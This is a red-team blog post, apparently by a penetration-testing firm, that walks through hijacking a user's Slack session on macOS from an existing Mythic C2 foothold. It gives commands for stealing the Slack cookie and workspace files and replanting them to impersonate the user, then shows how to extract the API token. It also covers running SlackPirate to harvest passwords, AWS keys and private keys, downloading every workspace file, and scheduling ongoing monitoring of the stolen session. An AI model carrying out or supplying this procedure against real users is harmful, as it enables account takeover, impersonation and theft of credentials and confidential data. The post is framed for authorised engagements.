Leveraging hijacked Slack sessions on macOS

Let’s face it, Slack is a treasure trove of information for hackers. Credentials. Proprietary data. Social engineering opportunities. You get the picture – it’s an information-rich environment.

I’m going to dig into Slack workspace compromise to provide additional information and tooling you can use to leverage access. This guidance will build off of “Abusing Slack for Offensive Operations”, a great article Cody Thomas wrote for the SpectreOps blog.

In his article, Cody describes a still-working method for hijacking a user’s slack session using low-privileged access to a macOS local file system. We’re going to take it a bit further.

Getting Started

All TTP’s described are dependent on the fact that the operator has a command and control session with a macOS machine. We will work through the following:

• Use of Mythic C2 for session extraction
• Setting up access for this compromised session
• Leveraging your access with tooling

Mythic C2

Mythic C2 is the best command-and-control framework for macOS (and probably a close second to other paid C2s out there) on the market. Let’s say we have a shell on a user’s workstation, achieved through Mythic Poseidon payload execution.

With this, let’s check if the user has Slack installed. A quick way to do this if you don’t want to browse around the filesystem is to use this command:

system_profiler SPApplicationsDataType | grep -i slack

In Mythic, execute this using the command window for your target session:

If valid, Mythic will return output similar to what is shown below:

Now that we know Slack is installed, we want to quickly grab two files directly related to our compromised user’s session. For this, we’ll use the download command provided by our agent. The files we need will be in one of two places. In my experience, the files almost always are available in this directory:

~/Library/Application Support/Slack/

If it’s not there, check:

~/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack

Use the following commands in Mythic to download our needed files – assuming everything is in the first path mentioned above:

download "~/Library/Application Support/Slack/storage/slack-workspaces"
download "~/Library/Application\ Support/Slack/Cookies"

You should see something similar to what is shown below in Mythic following a successful download:

Once you have those files, we can set up our actual Slack client, where we’ll impersonate our user.

Setup

I won’t dwell too long on this, as the setup is pretty straightforward. All you need is a never-before used install of Slack on macOS.

I recommend you do this on a macOS virtual machine. Once you have an environment prepared, copy your stolen files into the VM and do the following:

1. Launch Slack for the first time and then close it completely

2. Execute similar commands to the ones below to copy everything to where it needs to be

   cp slack-workspaces "~/Library/Application Support/Slack/storage/slack-workspaces"
   cp Cookies "~/Library/Application\ Support/Slack/Cookies"
   rm "~/Library/Application\ Support/Slack/storage/root-state.json"

3. Launch the Slack application

You should now have an active session ready to go for your post-exploitation efforts.

Post Exploitation

Here is where we get into some stuff not covered in Cody’s article. I want to showcase some tooling and methodology I’ve used on recent engagements to leverage our stolen session.

Before we do anything, an interesting aspect of this attack is the fact that we’re not only able to access the user’s Slack workspace but also extract the user’s API token. These tokens are generally prefaced by xox or xoxs. From the Slack client, navigate to the following menu item shown below and click.

After clicking “customize,” a browser window will open with a session for your impersonated user. From here, you can grab the user’s API token needed for most tools detailed below. To get the token, do this:

1. In Chrome, click the “three dots” in the upper right-hand corner.

2. Click on “More Tools” -> “Developer Tools”.

3. Select “network” and “headers” views in right-side pane of developer tools.

4. While logged into Slack, visit https://.slack.com/customize/emoji

5. Click on info and scroll down to grab your token:

6. Save the token for later

Tooling

SlackPirate

Now that we have our token, we can do some fun stuff. One classic piece of tooling for workspace enumeration is SlackPirate:

emtunc/SlackPirate This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token. As of May 2018, Slack has over 8 million

https://github.com/emtunc/SlackPirate

SlackPirate is nuts. It lets us extract the following out of the box:

• Print to standard output the domains (if any) allowed to register for the Workspace. I’ve seen stale, old and forgotten domains here that can be purchased and used to register for the Workspace.

• Links to S3 buckets

• Passwords

• AWS access/secret keys

• Private keys

• Pinned messages across all channels

• References to links and URLs that could provide further access to sensitive materials - Google Docs, Trello Invites, links to internal systems, etc.

• Files that could contain sensitive information such as .key, .sh, the words “password” or “secret” embedded in a document, etc.

For example, we can use the following command to extract all possible credentials from the workspace:

python3 SlackPirate.py --token xoxs-3444921100-[REDACTED] --credential-scan

SlackPirate uses the following regular expressions to search for possible credentials:

CREDENTIALS_REGEX = r"(?i)(" \
r"password\s*[`=:\"]+\s*[^\s]+|" \
r"password is\s*[`=:\"]*\s*[^\s]+|" \
r"pwd\s*[`=:\"]*\s*[^\s]+|" \
r"passwd\s*[`=:\"]+\s*[^\s]+)"

You can of course easily add more to meet your needs. You can additionally modify all regular expressions for each search to meet the needs of your engagement. I usually roll with the following parameters:

--team-access-logs --user-list --pinned-message-scan --aws-key-scan --private-key-scan --link-scan

slack-file

To download files from a workspace, I really like the tool linked below:

tmyymmt/slack-file Show slack file list, download slack files, delete slack files by channel and period of time. Table of Contents Require Golang environment and setup GOPATH. $ go get

https://github.com/tmyymmt/slack-file

This is a slick little tool written in golang that lets you download files from a workspace. Once installed, you can execute the command below:

slack-file  --download --to-with-date --to-with-channels --type=all --token xoxs-3444921100-[REDACTED]

This will download all files from a workspace with corresponding dates and channel IDs. You can also change the --type= flag to only download Microsoft Word documents, for example.

slack-watchman

An interesting part of this attack path is that once you hijack a user’s session, it appears to be available to the attacker for an indefinite amount of time. Therefore, we can easily build something to watch our target workspace for sensitive data. This is useful for:

• Defenders

• Continuous penetration testing

• Long-term Red Team engagements

The tool slack-watchman will help you achieve this:

PaperMtn/slack-watchman Monitoring your Slack workspaces for sensitive information Slack Watchman is an application that uses the Slack API to look for potentially sensitive data exposed in your Slack workspaces.

https://github.com/PaperMtn/slack-watchman

This tool has a premade set of YAML files used to detect sensitive information. This can easily be expanded upon to meet the needs of your engagement. The one downside to this tooling is that there is no way of knowing when sensitive data is published to the workspace without checking the resulting logfile manually.

Let’s set up notifications and a cronjob to tell us about sensitive information posted to a workspace within the last 24 hours. Here’s how:

1. Install slack-watchman using pip

   pip install slack-watchman

2. Setup your slack-watchman config file in your home folder with the name, watchman.conf:

   slack_watchman:
   token: xoxs-3444921100-891374457668-1593787740740-REDACTED

   You’ll need to update the above values to match your user’s token and desired log output path. The token is the one we grabbed earlier.

3. Write a simple Bash script.

#!/bin/bash

log="slack_watchman.log"
slack_webhook="<URL>"
slack-watchman --timeframe w --pii --financial --tokens --files --output file
changed=$(find "$log" -mmin -60 -type f -print)

if [ "$changed" = "$log" ]; then
curl -X POST -H 'Content-type: application/json' \
--data '{"text":"We found something new!"}' "$slack_webhook"
fi

Modify the script above to contain your log file location and Slack Webhook URL. Additionally, modify the slack-watchman command to meet your needs.

4. Setup a cronjob

   0 5 1 * * /bin/bash ~/slackwatch.sh >/dev/null 2>&1

Again, modify the cronjob to meet your needs and to reflect your script’s location and name.

This solution is far from plug-and-play. Some definite improvements can be made here, such as:

• In the notification, include what changed

• Doing larger scans for widened time periods

• Custom/additional detections

Final Thoughts

Accessing an organization’s Slack workspace is significant. With continuous penetration testing, we amplify the impact tenfold by continuously monitoring Slack workspaces for sensitive information.

If you want to understand the role continuous penetration testing plays – and why it’s relevant for exposing critical information disclosure such as this, send us a note any time.